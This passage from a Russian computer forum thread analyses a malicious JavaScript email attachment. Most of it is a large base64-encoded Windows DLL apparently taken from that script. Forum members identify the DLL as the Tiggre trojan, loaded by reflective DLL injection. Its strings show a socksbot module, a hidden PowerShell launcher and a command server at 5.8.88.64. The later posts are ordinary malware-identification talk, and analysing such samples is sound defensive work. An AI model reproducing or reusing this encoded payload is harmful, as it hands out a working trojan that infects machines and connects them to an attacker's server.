esCM9sPtvxr/wyBx0BUABBWjUcIUMYFHlQAEACJRfz/FXBAABCFwHQiibAIAAEA/3YE/xWIQAAQav//dgT/FYxAABCFwA+FswAAAItFC
DwBdjI8AnQLPAN1O2oAD7bE6xlqAFONRglQ/3cE6OYBAACFwH8hD7ZFCWoBUOjm9///WVnrEVONRglQjUUIUOhI/f//g8QMi338VmoAV
/8VdEAAEDvGdCmDvggAAQAAdQhqAf8VSEAAEIuGCAABAIXAdAv/cAT/FYRAABDrA4MnAP92BP8ViEAAEIOmCAABAABq/8YGAP92BP8Vj
EAAEIXAD4SK/v//6wfGBR9UABABX1szwF7JwgQAVYvsU4sdjEAAEFaLdQhq//92BP/ThcB1bVeAPR9UABAAdWKLfghr/wxq/41GDGj//
wAAgcdAVAAQUP93BOip+f//g8QQhcB+FlCNRgxQD7ZGCFBqAug0AAAAg8QQ6wxqAf92COj29v//WVn/dgT/FYhAABDGBwBq/8YGAP92B
P/ThcB0lV9eM8BbXcIEAFWL7IpFCFaLdRRXiEUIikUMvyRUABBXiEUJZol1Cv8VfEAAEI1FCGoEUOjj9///WVlqAGoEjUUIUP81IFQAE
Oh9AAAAhfZ+HFb/dRDowff//1lZagBW/3UQ/zUgVAAQ6F0AAABX/xWAQAAQX7ABXl3DVYvs/3UI/3UM/xW0QAAQi0UMXcP/JSxAABD/J
TBAABD/JTRAABD/JRhBABD/JRxBABD/JSBBABD/JSRBABD/JShBABD/JSxBABD/JTBBABD/JTRBABD/JRRBABD/JfxAABD/JRBBABD/J
QxBABD/JQhBABD/JQRBABD/JQBBABD/JXhBABDMzMzMzMzMzMzMi0QkCItMJBALyItMJAx1CYtEJAT34cIQAFP34YvYi0QkCPdkJBQD2
ItEJAj34QPTW8IQAP8lVEEAEP8lUEEAEP8lPEEAEP8lQEEAEP8lREEAEP8lSEEAEP8lTEEAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAEZJAAAAAAAAHEkAACxJAAAQSQAA+kgAANZIAADgSAAAAAAAANhFAADoRQAA9kUAABJGAAAkRgAANEYAAEZGAABURgAAZEYAA
HRGAAB8RgAAjEYAAKBGAACwRgAAykUAANxGAADqRgAAAkcAABZHAAAsRwAAQkcAAGBHAAB8RwAAlEcAAKxHAAC4RwAAxkcAANxHAAC+R
QAAskUAAKRFAACORQAAfEUAAHBFAABkRQAAxEYAAFhFAAAAAAAA6kkAAAJKAAD0SQAAAAAAAIxIAABySAAAWEgAAJpIAAAuSAAAGkgAA
AZIAAD6RwAAtkgAAEJIAACmSAAAAAAAADQAAIBvAACADwAAgAYAAIB0AACAcwAAgBcAAIADAACABAAAgAkAAIALAACADAAAgBAAAIASA
ACAEwAAgAAAAAB4SgAAjEoAAKRKAADCSgAA3koAAGZKAABUSgAAAAAAAIZJAADKSQAAoEkAALhJAAAAAAAAZEkAAAAAAAAwSgAAAAAAA
EdFVCAvAAAAIEhUVFAvMS4xDQoASG9zdDogAABVc2VyLUFnZW50OiAAAAAAQWNjZXB0OiAqLyoNCgAAAERhdGU6AAAAc3ZjaG9zdC5le
GUgLWsgbmV0c3ZjcwAAa2VybmVsMzIuZGxsAAAAAEdldFByb2NBZGRyZXNzAABMb2FkTGlicmFyeUEAAAAAQzpcACV4AAAucGhwAAAAA
Edsb2JhbFwlc25wcwAAAABHbG9iYWxcJXNzdHAAAAAALnBzMQAAAAAAAAAAJXNcU3lzdGVtMzJcV2luZG93c1Bvd2VyU2hlbGxcdjEuM
Fxwb3dlcnNoZWxsLmV4ZSAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtTm9Mb2dvIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxlIC1Xa
W5kb3dTdHlsZSBIaWRkZW4gLUZpbGUgIiVzIgBXaW5TdGEwAK48a7koB9MRnXsAAPge8y615FsdSvotRZzdXbNRBefr/EMAAAAAAAAAA
AAA7EcAACRAAACkRAAAAAAAAAAAAADKSAAAzEAAAOBDAAAAAAAAAAAAADxJAAAIQAAA2EMAAAAAAAAAAAAAVkkAAABAAABIRQAAAAAAA
AAAAAB8SQAAcEEAADRFAAAAAAAAAAAAAOBJAABcQQAAlEQAAAAAAAAAAAAAGEoAALxAAADURAAAAAAAAAAAAAAkSgAA/EAAAFBFAAAAA
AAAAAAAAEhKAAB4QQAAFEUAAAAAAAAAAAAA9koAADxBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEZJAAAAAAAAHEkAACxJAAAQSQAA+kgAA
NZIAADgSAAAAAAAANhFAADoRQAA9kUAABJGAAAkRgAANEYAAEZGAABURgAAZEYAAHRGAAB8RgAAjEYAAKBGAACwRgAAykUAANxGAADqR
gAAAkcAABZHAAAsRwAAQkcAAGBHAAB8RwAAlEcAAKxHAAC4RwAAxkcAANxHAAC+RQAAskUAAKRFAACORQAAfEUAAHBFAABkRQAAxEYAA
FhFAAAAAAAA6kkAAAJKAAD0SQAAAAAAAIxIAABySAAAWEgAAJpIAAAuSAAAGkgAAAZIAAD6RwAAtkgAAEJIAACmSAAAAAAAADQAAIBvA
ACADwAAgAYAAIB0AACAcwAAgBcAAIADAACABAAAgAkAAIALAACADAAAgBAAAIASAACAEwAAgAAAAAB4SgAAjEoAAKRKAADCSgAA3koAA
GZKAABUSgAAAAAAAIZJAADKSQAAoEkAALhJAAAAAAAAZEkAAAAAAAAwSgAAAAAAAEcFbHN0cmNweUEAAD4FbHN0cmNhdEEAAE0FbHN0c
mxlbkEAAKQAQ3JlYXRlUHJvY2Vzc0EAAG8CR2V0U3lzdGVtRGlyZWN0b3J5QQBEA0xvY2FsQWxsb2MAAEgDTG9jYWxGcmVlACUFV3Jpd
GVGaWxlAFIAQ2xvc2VIYW5kbGUAkwJHZXRUaWNrQ291bnQAAIgAQ3JlYXRlRmlsZUEAvgBDcmVhdGVUb29saGVscDMyU25hcHNob3QAA
JUDUHJvY2VzczMyRmlyc3QAAJcDUHJvY2VzczMyTmV4dABFAkdldFByb2NBZGRyZXNzAAAZAUV4aXRQcm9jZXNzALUAQ3JlYXRlVGhyZ
WFkAAACAkdldExhc3RFcnJvcgAAsgRTbGVlcACbAENyZWF0ZU11dGV4QQAAFQJHZXRNb2R1bGVIYW5kbGVBAACEAkdldFRlbXBQYXRoQ
QAAggJHZXRUZW1wRmlsZU5hbWVBAACuAkdldFdpbmRvd3NEaXJlY3RvcnlBAADTAERlbGV0ZUZpbGVBAKUCR2V0Vm9sdW1lSW5mb3JtY
XRpb25BAIwBR2V0Q29tcHV0ZXJOYW1lQQAAxQFHZXRDdXJyZW50VGhyZWFkSWQAAOwCSW50ZXJsb2NrZWRFeGNoYW5nZQDpAkludGVyb
G9ja2VkQ29tcGFyZUV4Y2hhbmdlAADiAkluaXRpYWxpemVDcml0aWNhbFNlY3Rpb24A7gBFbnRlckNyaXRpY2FsU2VjdGlvbgAAOQNMZ
WF2ZUNyaXRpY2FsU2VjdGlvbgAAWQRTZXRFdmVudAAADwRSZXNldEV2ZW50AAD5BFdhaXRGb3JTaW5nbGVPYmplY3QAggBDcmVhdGVFd
mVudEEAAEtFUk5FTDMyLmRsbAAAMgN3c3ByaW50ZkEAKgJPcGVuSW5wdXREZXNrdG9wAAC6AlNldFRocmVhZERlc2t0b3AAAIIBR2V0V
GhyZWFkRGVza3RvcAAALAJPcGVuV2luZG93U3RhdGlvbkEAAKoCU2V0UHJvY2Vzc1dpbmRvd1N0YXRpb24AaAFHZXRQcm9jZXNzV2luZ
G93U3RhdGlvbgCSAUdldFdpbmRvd0RDAGUCUmVsZWFzZURDAJwBR2V0V2luZG93UmVjdAAjAUdldERlc2t0b3BXaW5kb3cAAFVTRVIzM
i5kbGwAABMAQml0Qmx0AAAvAENyZWF0ZUNvbXBhdGlibGVCaXRtYXAAADAAQ3JlYXRlQ29tcGF0aWJsZURDAADjAERlbGV0ZURDAADmA
ERlbGV0ZU9iamVjdAAAdwJTZWxlY3RPYmplY3QAAEdESTMyLmRsbABkAUdldFVzZXJOYW1lQQAAQURWQVBJMzIuZGxsAACGAENyZWF0Z
VN0cmVhbU9uSEdsb2JhbABvbGUzMi5kbGwAIAVad0FsbG9jYXRlVmlydHVhbE1lbW9yeQCSBlp3V3JpdGVWaXJ0dWFsTWVtb3J5AAA3B
lp3UmVzdW1lVGhyZWFkAABCBlp3U2V0Q29udGV4dFRocmVhZAAAbnRkbGwuZGxsAEMBU3RyU3RyQQAzAFBhdGhBcHBlbmRBAEYAUGF0a
EZpbmRFeHRlbnNpb25BAABTSExXQVBJLmRsbABXUzJfMzIuZGxsAABUAE9idGFpblVzZXJBZ2VudFN0cmluZwB1cmxtb24uZGxsAAB1A
kdkaXBsdXNTdGFydHVwAAB0AkdkaXBsdXNTaHV0ZG93bgCYAEdkaXBEaXNwb3NlSW1hZ2UAAPEBR2RpcFNhdmVJbWFnZVRvU3RyZWFtA
E0AR2RpcENyZWF0ZUJpdG1hcEZyb21IQklUTUFQAB8BR2RpcEdldEltYWdlRW5jb2RlcnNTaXplAAAeAUdkaXBHZXRJbWFnZUVuY29kZ
XJzAABnZGlwbHVzLmRsbAAAAAAAAAAAAAAAAAAAAAAAAADdcPNZAAAAAEJLAAABAAAAAQAAAAEAAAA4SwAAPEsAAEBLAAC6JgAAT0sAA
AAAc29ja3Nib3QuZGxsAD9SZWZsZWN0aXZlTG9hZGVyQEBZR0tQQVhAWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADYwAAAAAAAA7Bq8tm9kESbCJQxc8myZAr1TBD6q9f4DdFlyYWdP1zLiw
EmKn6BiA8VkEyPDtN3LXNiiKg7crjmhHX6YorG2J2xZXnzB4aDHQ7jAdUFsfbPLUJq1BZVW6Z0oGL3d7uUIrIcUdCOcxLVSeortSZSdW
kIceFSE7QhPH809PP0djYsAAAAAAAAAADUuOC44OC42NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAABAAAMgAAAALMCAwMTA/MF0wazB7MIcwqzDDMNsw8jAWMVcxoDEAMocynjLYMvUyPjO0M+Mz9jN9NLo02TQKNTI1WDXmNSI2XzaZN
tE27zZaN5k3IjhAOGM4bziEOMA4FzlROZ85qTlvOrA65jpNO1w7oTuzO7g72TsAPGs8jzynPK480jw7PUs9lj2cPbg9vj3cPfQ9Oz5RP
l4+bD57PrE+yD7XPu0+BT8NPxQ/MT83P0k/Wj9fP2k/dj98P4M/ij/HP9g/AAAAIAAAGAEAAAIwPTBUMGMwhDCMMJMwsTDMMNQw2zAaM
TExPjFMMWMxgjGgMSgyOTJKMlEyVzJdMnky6TIhMyYzWjN0M30zjzOeM6UzujPzM/ozADQcNCI0OTRBNGI0ejSINJs0pTS2NMQ0zzTeN
OM07DT7NAA1BTUsNTM1PDVONV01YjVxNXc1ijWQNaY1sTXANQk2MTY/Nks2hDaKNpE24jrzOr07wzvLO9I73zvnO+479Tv7OwU8FjwpP
Eo8WTxzPIE8izyVPCc9dT2MPSM+PT5iPmk+cD56PoA+jz6tPrQ+uj7OPtU+3D7oPu4+Aj8ePyU/Kz9EP3k/hj+OP5U/rj+2P8E/yD/WP
9w/4T/nP+0/8z/5PwAAADAAALQAAAAAMAUwZzCQMJkwoTC2MNwwRDF0MX0xkTGkMd8x7DH/MT4yRDJNMlgyZjJuMnsymTKwMsMy0DLkM
gc0RDRMNFs0ZzRvNHY0izSbNLA09DQmNTE1OzVONVk1uDXNNeA17jUDNhM2JzY9NlY2kTbBNs826jYKNxY3Kzc2Nzw3QjdIN043VDdaN
2A3ZjdsN3I3eDd+N4Q3ijeQN5Y3nDeiN+Y37DfyN/g3/jcEOAo4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
#Example of decrypting functions
#$strexp = "...";
0
ISergey
Maniac
Эксперт С++
1409 / 920 / 148
Регистрация: 02.01.2009
Сообщений: 2,749
Записей в блоге: 1
05.12.2017, 15:37 9
Лучший ответ Сообщение было отмечено bliver как решение

Решение

Цитата Сообщение от bliver Посмотреть сообщение
я не смог понять что содержится в строке strexp, то ли это двоичный код, то ли MSIL
strexp dll (x86) - тело малвари (или тоже промежуточный загрузчик)
Trojan:Win32/Tiggre .

Скрипт это загрузчик ReflectiveDLLInjection
2
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
05.12.2017, 16:47  [ТС] 10
ясно, благодарен за ответ
0
n0rtn
0 / 0 / 0
Регистрация: 12.06.2018
Сообщений: 3
12.06.2018, 18:58 11
Цитата Сообщение от bliver Посмотреть сообщение
Здравствуйте!
Пришло мне письмо


Внутри был файл javascript, мне стало интересно, что делает данный зловред.
В файле js был большой
В раскрутил и проследил по скриптам
bliver, приветствую! А нету ли у Вас самого файла или даже письма, с которым получен зловред? Спасибо!
0
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
12.06.2018, 19:45  [ТС] 12
Привет! нашел )
0
n0rtn
0 / 0 / 0
Регистрация: 12.06.2018
Сообщений: 3
13.06.2018, 12:21 13
Цитата Сообщение от bliver Посмотреть сообщение
Привет! нашел )
Спасибо! Насколько я понимаю, это не именно то, что "прилетело" в письме? Мне бы Вам в Личные сообщения написать, но пока не могу этого сделать - мало сообщений на этом форуме.

Добавлено через 2 часа 42 минуты
Цитата Сообщение от ISergey Посмотреть сообщение
strexp dll (x86) - тело малвари (или тоже промежуточный загрузчик)
Trojan:Win32/Tiggre .

Скрипт это загрузчик ReflectiveDLLInjection
Вроде бы эта DLLка выходит на связь с сервером по адресу 5.8.88[.]64
0
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
13.06.2018, 15:32  [ТС] 14
Такое было вложение, только не заархивированное, просто файл с названием Договор.js, само письмо обычный текст, как я привел в начале темы.
0
Sandor
Вирусоборец
13116 / 11332 / 1762
Регистрация: 08.10.2012
Сообщений: 45,842
13.06.2018, 15:35 15
Правила п.5.7
0
n0rtn
0 / 0 / 0
Регистрация: 12.06.2018
Сообщений: 3
13.06.2018, 18:01 16
Цитата Сообщение от bliver Посмотреть сообщение
Такое было вложение, только не заархивированное, просто файл с названием Договор.js, само письмо обычный текст, как я привел в начале темы.
Я почему и хотел списаться в личке, так как из-за меня пришлось нарушить правила 5.7.
Вы можете как-то показать то письмо со всеми заголовками (информацию о Вашем адресе/сервере имеет смысо скрыть)? Напишите мне в личку, как будет время, пожалуйста. Сорс письма посмотреть очень просто.

Спасибо!
0
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
13.06.2018, 19:20  [ТС] 17
Не могу показать то письмо, так как это давно уже было и я его просто удалил, а после 2 месяцев удаленные письма очищаются вообще на используемом мной сервере.
1
13.06.2018, 19:20
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
13.06.2018, 19:20

Как найти тело вируса JUST
Вызвали с отпуска, кто-то открыл письмо с вирусом just, теперь у всех файлов на...

Спасет ли ситуацию удаление вируса из автозагрузки
Если вирус прописался автозагрузкой через реестр то он будет создаваться?Или я...

Как защититься от рекламного вируса Mail.ru?
Всё знают этот навязывающий вирус, устанавливающий продукты mail.ru без ведома...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
17
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru